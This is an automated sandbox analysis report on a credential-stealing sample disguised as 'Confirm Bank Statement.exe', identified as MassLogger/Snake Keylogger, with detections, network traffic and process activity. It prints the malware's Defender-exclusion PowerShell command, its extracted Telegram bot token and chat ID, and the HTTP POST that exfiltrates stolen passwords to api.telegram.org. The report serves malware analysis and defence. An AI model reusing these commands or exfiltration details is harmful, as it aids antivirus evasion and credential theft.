Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Confirm Bank Statement.exe

Overview

General Information

Sample name:Confirm Bank Statement.exe
Analysis ID:1590892
MD5:d16a155d98d41cf4109fc2ebe34c0ab4
SHA1:93176aab1ccb1db112204c4860405bb9bffa1c9b
SHA256:e5eab0d46a0a0500431f1ef78dd03c8dc17b97794f558624dfa7a567e24245e1
Tags:exeuser-James_inthe_box
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Confirm Bank Statement.exe (PID: 5980 cmdline: "C:\Users\user\Desktop\Confirm Bank Statement.exe" MD5: D16A155D98D41CF4109FC2EBE34C0AB4)
    • powershell.exe (PID: 4512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Confirm Bank Statement.exe (PID: 4244 cmdline: "C:\Users\user\Desktop\Confirm Bank Statement.exe" MD5: D16A155D98D41CF4109FC2EBE34C0AB4)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E", "Telegram Chatid": "1780630805"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d747:$a1: get_encryptedPassword
        • 0x2da6f:$a2: get_encryptedUsername
        • 0x2d4e2:$a3: get_timePasswordChanged
        • 0x2d603:$a4: get_passwordField
        • 0x2d75d:$a5: set_encryptedPassword
        • 0x2f0b9:$a7: get_logins
        • 0x2ed6a:$a8: GetOutlookPasswords
        • 0x2eb5c:$a9: StartKeylogger
        • 0x2f009:$a10: KeyLoggerEventArgs
        • 0x2ebb9:$a11: KeyLoggerEventArgsEventHandler
        00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 20 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Confirm Bank Statement.exe.7240000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.Confirm Bank Statement.exe.3431648.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Confirm Bank Statement.exe.41d3150.3.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                0.2.Confirm Bank Statement.exe.41d3150.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Confirm Bank Statement.exe.41d3150.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 26 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirm Bank Statement.exe", ParentImage: C:\Users\user\Desktop\Confirm Bank Statement.exe, ParentProcessId: 5980, ParentProcessName: Confirm Bank Statement.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", ProcessId: 4512, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirm Bank Statement.exe", ParentImage: C:\Users\user\Desktop\Confirm Bank Statement.exe, ParentProcessId: 5980, ParentProcessName: Confirm Bank Statement.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", ProcessId: 4512, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Confirm Bank Statement.exe", ParentImage: C:\Users\user\Desktop\Confirm Bank Statement.exe, ParentProcessId: 5980, ParentProcessName: Confirm Bank Statement.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe", ProcessId: 4512, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:43:35.509681+010020577441Malware Command and Control Activity Detected192.168.2.749729149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:43:28.173614+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                    2025-01-14T16:43:34.454787+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-14T16:43:35.111519+010018100081Potentially Bad Traffic192.168.2.749729149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E", "Telegram Chatid": "1780630805"}
                    Source: Confirm Bank Statement.exe.4244.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: Confirm Bank Statement.exeVirustotal: Detection: 31%Perma Link
                    Source: Confirm Bank Statement.exeReversingLabs: Detection: 42%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: Confirm Bank Statement.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Confirm Bank Statement.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49705 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
                    Source: Confirm Bank Statement.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 00B55782h4_2_00B55358
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 00B551B9h4_2_00B54F08
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 00B55782h4_2_00B556AF
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287B220h4_2_0287AF78
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02871935h4_2_028715F8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287FD30h4_2_0287FA88
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02872D98h4_2_02872AF0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287D4E0h4_2_0287D238
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287A518h4_2_0287A270
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02873648h4_2_028733A0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287B678h4_2_0287B3D0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287ADC8h4_2_0287AB20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02874350h4_2_028740A8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287C380h4_2_0287C0D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02870B99h4_2_028708F0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287BAD0h4_2_0287B828
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 028702E9h4_2_02870040
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287E320h4_2_0287E078
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287CC30h4_2_0287C988
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02871449h4_2_028711A0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287F480h4_2_0287F1D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287EBD0h4_2_0287E928
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287D93Ah4_2_0287D690
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287A970h4_2_0287A6C8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287A0C0h4_2_02879E18
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287F8D8h4_2_0287F630
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02873AA0h4_2_028737F8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 028731F0h4_2_02872F48
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287BF28h4_2_0287BC80
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02870741h4_2_02870498
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287E778h4_2_0287E4D0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287DEC8h4_2_0287DC20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02873EF8h4_2_02873C50
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287F028h4_2_0287ED80
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287D088h4_2_0287CDE0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 0287C7D8h4_2_0287C530
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4x nop then jmp 02870FF1h4_2_02870D48

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49729 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49729 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34884aef51feHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49705 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34884aef51feHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1267719440.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_0143E0CC0_2_0143E0CC
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_01434AE00_2_01434AE0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_07275D400_2_07275D40
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_0727D5190_2_0727D519
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_0727E1E00_2_0727E1E0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_0727DDA80_2_0727DDA8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_07274B200_2_07274B20
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_07274B300_2_07274B30
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_0727D9600_2_0727D960
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_0727F8880_2_0727F888
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_072875E80_2_072875E8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_07289F500_2_07289F50
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_072845900_2_07284590
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 0_2_072875DB0_2_072875DB
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5C1684_2_00B5C168
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B527B94_2_00B527B9
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5CAB04_2_00B5CAB0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B52DD14_2_00B52DD1
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B57E684_2_00B57E68
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B54F084_2_00B54F08
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5B9E04_2_00B5B9E0
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5B9D84_2_00B5B9D8
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5CAAE4_2_00B5CAAE
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5EA644_2_00B5EA64
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B54EF84_2_00B54EF8
